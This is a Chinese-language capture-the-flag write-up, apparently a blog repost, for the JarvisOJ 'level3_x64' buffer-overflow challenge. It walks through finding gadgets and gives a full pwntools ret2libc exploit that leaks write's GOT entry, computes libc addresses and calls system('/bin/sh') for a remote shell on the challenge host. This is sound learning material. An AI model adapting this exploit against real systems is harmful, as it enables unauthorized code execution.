标签：addr libc x64 pop sh write level3 JarvisOJ p64

这题和level3大同小异，只不过这一题是x64的程序

做这题之前，建议先写level2_x64。
拿到这题，我们首先查看保护：

程序只开了NX保护，好的。
根据做过level3的经验，我们先找出我们需要的地址（也可以用pwntools工具自动找）：
vul（）函数：

write（）函数的plt地址：

之后我们找齐需要用的gadget：

但是我们并没有找到pop rdx ; ret，根据我们对write函数的了解，最后一个参数是用来控制长度的，所以，只要rdx寄存器的长度大于0x8就没有问题：
我们看一下：

我们通过GDB查看一下，运行时，rdx的值为0x200，这是完全足够的，我们就不需要控制他并对其赋值了。
做好以上准备之后，我们就可以来构造payload了，因为本题与level3的payload大同小异，在此就不详细讲构造过程了，直接给出完整的exp：

#!/usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com','9883')
elf=ELF('./level3_x64')
libc=ELF('./libc-2.19.so')
write_plt=elf.symbols['write']
write_got=elf.got['write']
vul_addr=0x04005e6
pop_rdi_addr=0x04006b3
pop_rsi_addr=0x04006b1
payload='A'*0x80+'A'*8+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_addr)+p64(write_got)+p64(0x0)+p64(write_plt)+p64(vul_addr)
p.recvuntil('Input:\n')
p.send(payload)
write_addr=u64(p.recv(8))
print "write_addr="+hex(write_addr)
write_libc=libc.symbols['write']
libc_eee=write_addr-write_libc
sys_libc=libc.symbols['system']
sh_libc=libc.search('/bin/sh').next()
sys_addr=libc_eee+sys_libc
sh_addr=libc_eee+sh_libc
p.recvuntil('Input:\n')
payload1='A'*0x80+'A'*8+p64(pop_rdi_addr)+p64(sh_addr)+p64(sys_addr)+'A'*8
p.send(payload1)
p.interactive()

运行结果：

标签：addr,libc,x64,pop,sh,write,level3,JarvisOJ,p64
来源： https://blog.csdn.net/qq_43986365/article/details/95203256

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。